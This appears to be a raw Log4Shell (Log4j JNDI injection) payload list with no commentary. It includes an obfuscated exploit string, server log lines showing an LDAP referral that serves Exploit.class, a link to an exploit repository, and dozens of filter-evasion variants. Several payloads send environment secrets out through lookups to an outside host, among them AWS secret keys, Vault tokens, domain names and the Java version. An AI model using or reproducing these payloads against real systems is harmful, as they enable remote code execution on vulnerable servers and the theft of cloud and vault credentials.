raw: ${jndi:ldap://127.0.0.1:1389/Exploit$Cz7YiA.I9m7d9LTt}



${j${w_OsC:l2[U52rbv:vJ_t9RYzVUL-YM8b:-n}${JuKpN:3xiJV:-d}i:${(5=6f9:XE@w0km]R8v:zVRe:-}${HQ7-nE*h:-ld}a${6mC_-Zf=[6-s0o$)2N:Ua:-p:}${1RZ*o:CRrU$XmQL:i=p:-/}/12${pf)*:fHX[6B]K:5p(:-7.}${4h-pRhyyuAxEWfr-B[Ud[5:-}${ChhQR9-l.]:-0.}${M8Iu6:F0eln1XJL:05TcXG:lc=Eh9:-0}${VAvnhL-FiXN3:-.1:}${Kd:x_vV]9W-LZpxvIC2=R:E6=PaL:-13}${@Q[)aP:d_LTuXN-$1l:-8}9/${H54-Ax@:-E}${*TcBP7-]oqUD:-xp}l${EF*:x2.Cm*:.lPhyI:*5:-o}it$Cz${K):QsO[Hc$-bVgz-YPH5_:-}7${8SMkT-rb6tCP-glR:-Y}iA${Z8w-HX(BEVN-m7H8:-.}${LIRg-hH50@SG[gI_-eOS.B:-I9m}7${7X0Ele-jw1)OuBrf_7-Q.hzlcW(:7pM:-d9L}${)4:o@FgW.Slqz-UnqnUZ(5i:VhEEXV:-}${Q]@ow:nVl=Xrft]zt-CaeDF3rX-4]9:-T}t}



127.0.0.1 - - [07/Jan/2022 12:07:17] "GET /Exploit.class HTTP/1.1" 200 -



Send LDAP reference result for Exploit$83dEPkmFMxdvs]dA redirecting to http://127.0.0.1:8888/Exploit.class

https://github.com/minhnq22/log4shell_exploit/commit/32c8d7e0c0d66ef59cf17178e04e81faf6512d8a

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}

${${::-j}ndi:rmi://hostname}

${jndi:ldap://hostname}

${jndi:rmi://hostname}

${${lower:jndi}:${lower:rmi}://hostname}

${${lower:${lower:jndi}}:${lower:rmi}://hostname}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname}

${jndi:ldap://hostname/ badClassName}

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}

${${::-j}ndi:rmi://hostname}

${jndi:rmi://hostname}

${${lower:jndi}:${lower:rmi}://hostname}

${${lower:${lower:jndi}}:${lower:rmi}://hostname}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname}

${${upper:jndi}:${upper:rmi}://hostname}

${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://hostname}

${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://hostname}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.hostname}

${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostname}.hostname}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.hostname}

${jndi:${lower:l}${lower:d}a${lower:p}://hostname/

${jndi:ldap://hostname/i_rock}

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//hostname}

/$%7Bjndi:ldap://hostname/Exploit%7D

/$%7Bjndi:ldap://x-ios-validation.com.hostname%7D

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.hostname}

${jndi:ldap://${env:VAULT_TOKEN}.hostname}

${jndi:rmi://${env:VAULT_TOKEN}.hostname}

${jndi:ldap://${env:AWS_GOVCLOUD_ACCESS_KEY}.hostname}

${jndi:ldap://${sys:java.version}.hostname}

${jndi:ldap://${hostname}.§§.${sys:java.version}.hostname}

${jndi:ldap://${env:JAVA_VERSION}.hostname}

${jndi:ldap://hostname/${java:version}}

/$%7bjndi:ldap:/$%7blower:/%7dhostname/o=tomcat%7d$%7blower:/%7d/

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}

${${::-j}ndi:rmi://hostname}

${jndi:rmi://hostname}

${${lower:jndi}:${lower:rmi}://hostname}


